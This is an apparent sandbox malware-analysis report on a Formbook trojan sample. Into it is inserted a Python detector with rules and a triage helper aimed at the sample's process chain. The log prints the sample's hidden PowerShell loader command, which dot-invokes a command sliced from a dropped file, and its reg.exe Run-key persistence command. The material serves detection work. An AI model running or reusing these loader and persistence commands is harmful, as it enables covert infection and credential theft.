        Source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@17/54@5/6
        Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_004045CA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
        Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_0040206A CoCreateInstance
        Source: C:\Users\user\Desktop\160420241245287.exe | File created: C:\Users\user\AppData\Roaming\opbevaringssteder
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
        Source: C:\Users\user\Desktop\160420241245287.exe | File created: C:\Users\user\AppData\Local\Temp\nsj6995.tmp
        Source: 160420241245287.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
        Source: C:\Users\user\Desktop\160420241245287.exe | File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\160420241245287.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: cmd.exe, 0000000C.00000003.2333166165.0000000002A35000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2886759611.0000000002A14000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2886759611.0000000002A35000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2330740762.0000000002A35000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: 160420241245287.exe | Virustotal: Detection: 18%
        Source: C:\Users\user\Desktop\160420241245287.exe | File read: C:\Users\user\Desktop\160420241245287.exe
        Source: unknown | Process created: C:\Users\user\Desktop\160420241245287.exe "C:\Users\user\Desktop\160420241245287.exe"
        Source: C:\Users\user\Desktop\160420241245287.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Untapestried.exe "C:\Users\user\AppData\Local\Temp\Untapestried.exe"
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
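The process list above shows the whole chain: the sample starts a hidden PowerShell that reads Randrusianeren.Unf, takes the three characters at offset 75194 as the name of a command and dot-invokes that command on the file contents; that PowerShell drops and runs Untapestried.exe, which writes the Run value through cmd.exe and reg.exe; later the binary under Program Files (x86) starts a cmd.exe with no arguments, and that cmd.exe starts Firefox. The detector below is an added example written for this page, not Joe Sandbox code: it replays the command lines from the list as process-creation events, applies three rules that match those shapes, and adds a triage helper that pulls the script path and the SubString offset out of the loader so the invoked command can be recovered from the dropped file. Process ids, the parent link for bvvgQqxLmFZr.exe (not shown in the report), that binary's command line and the stand-in script text used in the test are constructed.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
SUBSTRING_CALL = re.compile(r"\.SubString\((\d+)\s*,\s*(\d+)\)", re.I)
GET_CONTENT_PATH = re.compile(r"Get-Content\s+'([^']+)'", re.I)
DOT_INVOKE = re.compile(r"\.\$\w+\s*\(")            # .$var(...) runs the command named in $var
RUN_KEY_WRITE = re.compile(r"\breg(?:\.exe)?\s+add\b.*\\CurrentVersion\\Run\b", re.I | re.S)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
BROWSERS = ("firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe")


def lineage(ev: ProcEvent, by_pid: dict):
    """Yield ev's ancestors, nearest first, until the parent is unknown."""
    cur = by_pid.get(ev.ppid)
    while cur is not None:
        yield cur
        cur = by_pid.get(cur.ppid)


def is_bare_cmd(ev: ProcEvent) -> bool:
    """cmd.exe started with no arguments at all, the shape of the injected host in the report."""
    return ev.image.lower().endswith("cmd.exe") and \
        ev.cmdline.strip().strip('"').lower().endswith("cmd.exe")


def detect(ev: ProcEvent, by_pid: dict) -> list:
    findings = []
    image, cl = ev.image.lower(), ev.cmdline
    # Rule 1: hidden PowerShell that reads a file, slices a command name out of it, dot-invokes it.
    if (image.endswith("powershell.exe") and HIDDEN_WINDOW.search(cl)
            and "get-content" in cl.lower() and SUBSTRING_CALL.search(cl) and DOT_INVOKE.search(cl)):
        findings.append("powershell_file_backed_loader")
    # Rule 2: Run-key write whose process chain passes through a binary in %LOCALAPPDATA%\Temp.
    if RUN_KEY_WRITE.search(cl) and any(TEMP_DIR.search(a.image) for a in lineage(ev, by_pid)):
        findings.append("run_key_write_from_temp_lineage")
    # Rule 3: a browser launched by a bare cmd.exe (the injected host opening Firefox above).
    parent = by_pid.get(ev.ppid)
    if image.endswith(BROWSERS) and parent is not None and is_bare_cmd(parent):
        findings.append("browser_launched_by_bare_cmd")
    return findings


def loader_triage(cmdline: str):
    """Pull the script path and SubString(offset, length) out of the loader command line."""
    path, sub = GET_CONTENT_PATH.search(cmdline), SUBSTRING_CALL.search(cmdline)
    if not (path and sub):
        return None
    return {"script": path.group(1), "offset": int(sub.group(1)), "length": int(sub.group(2))}


def recover_invoked_command(script_text: str, offset: int, length: int) -> str:
    """Apply the same slice PowerShell applies; the result is the command that gets dot-invoked."""
    return script_text[offset:offset + length]


# Command lines copied from the report's process list. Pids, the parent link for pid 7 and
# the command line of bvvgQqxLmFZr.exe are constructed for the example.
EVENTS = [
    ProcEvent(1, 0, r"C:\Users\user\Desktop\160420241245287.exe",
              r'"C:\Users\user\Desktop\160420241245287.exe"'),
    ProcEvent(2, 1, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''"powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"'''),
    ProcEvent(3, 2, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"'),
    ProcEvent(4, 2, r"C:\Users\user\AppData\Local\Temp\Untapestried.exe",
              r'"C:\Users\user\AppData\Local\Temp\Untapestried.exe"'),
    ProcEvent(5, 4, r"C:\Windows\SysWOW64\cmd.exe",
              r'''"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"'''),
    ProcEvent(6, 5, r"C:\Windows\SysWOW64\reg.exe",
              r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"'''),
    ProcEvent(7, 0, r"C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe",
              r'"C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe"'),
    ProcEvent(8, 7, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\SysWOW64\cmd.exe"'),
    ProcEvent(9, 8, r"C:\Program Files\Mozilla Firefox\firefox.exe", r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
]


def run_all(events=EVENTS) -> dict:
    """{pid: findings} for every event that trips at least one rule."""
    by_pid = {e.pid: e for e in events}
    return {e.pid: f for e in events if (f := detect(e, by_pid))}


if __name__ == "__main__":
    for pid, findings in run_all().items():
        print(pid, findings)
```

The triage helper is the part worth keeping at hand: once Randrusianeren.Unf has been collected, recover_invoked_command(open(path).read(), 75194, 3) gives the verb the loader runs, which the command line alone does not reveal and which the report does not state.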
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: shfolder.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: riched20.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: usp10.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: msls31.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: textinputframework.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: coreuicomponents.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\160420241245287.exe | Section loaded: textshaping.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: powrprof.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: wkscli.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: umpdc.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: edputil.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: appresolver.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: bcp47langs.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: slc.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: sppc.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5~ source: powershell.exe, 00000001.00000002.2060432087.000000000767E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887014647.0000000000A4E000.00000002.00000001.01000000.0000000A.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000002.2886634622.0000000000A4E000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: wntdll.pdbUGP source: Untapestried.exe, 00000007.00000003.2059573045.0000000020323000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.00000000204D0000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.000000002066E000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2057819676.0000000020179000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2155560339.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2157021649.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: cmd.pdbUGP source: Untapestried.exe, 00000007.00000003.2114834443.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2155304124.00000000201F1000.00000004.00000020.00020000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000003.2085185213.0000000000E0B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Untapestried.exe, Untapestried.exe, 00000007.00000003.2059573045.0000000020323000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.00000000204D0000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.000000002066E000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2057819676.0000000020179000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000C.00000003.2155560339.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2157021649.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp
        Source: Binary string: cmd.pdb source: Untapestried.exe, 00000007.00000003.2114834443.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2155304124.00000000201F1000.00000004.00000020.00020000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000003.2085185213.0000000000E0B000.00000004.00000001.00020000.00000000.sdmp
